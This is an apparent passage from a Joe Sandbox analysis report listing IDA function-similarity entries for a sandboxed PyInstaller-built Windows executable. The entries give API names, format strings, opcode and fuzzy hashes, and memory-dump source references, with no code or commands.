                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %s: %s$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3704582800
                                                                                                                                                                                                                                                        • Opcode ID: a5f084cc36529dd82358bb6d3c03fbfc020d3d736b3f3fde6876dd26524326fa
                                                                                                                                                                                                                                                        • Instruction ID: b291f8475dc1fa3caf229ec95cbd43e06106647aa178b8013fd11ba4d138a2d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5f084cc36529dd82358bb6d3c03fbfc020d3d736b3f3fde6876dd26524326fa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C21F363B1AA8156E6209761BC116E66294FFCCBD4F400131FF8DD7B6AEE3CD156C200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                        • Opcode ID: e405b3d95a77a686cd9e65060fb5efdbb8b04b637a4feec6827f9fe163836890
                                                                                                                                                                                                                                                        • Instruction ID: cd91884033939f6956dbe565d44bf8f49972abdeebe5162cea6ec19b9aca23e5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e405b3d95a77a686cd9e65060fb5efdbb8b04b637a4feec6827f9fe163836890
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5218162B0968181EB20DB29D4A426D73B1FB8CB84F854135DB8D83695EF7CE985C780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6ABA428DA,FFFFFFFF,00000000,00007FF6ABA4336A), ref: 00007FF6ABA4218E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: WARNING$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3752221249
                                                                                                                                                                                                                                                        • Opcode ID: 28628bd70d5a97629098dcd42eabd330bee057474c06a66384895197b474a4b9
                                                                                                                                                                                                                                                        • Instruction ID: de0fffd2c597442b1eb3ae6addf18f0e589f245fe7007847d1501061cf37cac1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28628bd70d5a97629098dcd42eabd330bee057474c06a66384895197b474a4b9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA11937261AB8191E6209B65B8916EA7754FF887C4F400135FB8D83B69EE7CD1558700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6ABA41B79), ref: 00007FF6ABA41E9E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: ERROR$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3005936843
                                                                                                                                                                                                                                                        • Opcode ID: c1c0bec23ccac853a0e083361079492e25c9a947d7081d13b76ea5259852d608
                                                                                                                                                                                                                                                        • Instruction ID: dd3ac65d766565f533f068840aa290888897a6180115024dae948baebf3a5b8e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1c0bec23ccac853a0e083361079492e25c9a947d7081d13b76ea5259852d608
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9119072A1AB8191E6209B61B8816EA7764FF887C4F400135FB8D83B6AEE7CD1568704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: 778d4a5eeee770603d02c5501bef52114850414878b0bee781498c4a1570bacf
                                                                                                                                                                                                                                                        • Instruction ID: 1464343e827c51e3a278db0ff2f4d70e18147a84979c93e0a9030c90c360f8aa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 778d4a5eeee770603d02c5501bef52114850414878b0bee781498c4a1570bacf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A112B32619B8182EB618F25F54026AB7E4FB88B88F585234DFDD47768EF3DD5518B00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                        • Opcode ID: a21020f9989eba13c36801fee87724dcdfb53302495b3b0e02d80308072ceaa1
                                                                                                                                                                                                                                                        • Instruction ID: b1e694ece41bd862f689cb3347ab88a9d94dde3568f95f62be7a014ffc6bc544
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a21020f9989eba13c36801fee87724dcdfb53302495b3b0e02d80308072ceaa1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4017C62A1D64286E730AF64946237E66A0EF4C748F802136DB4DC26A5FE2DE6449A14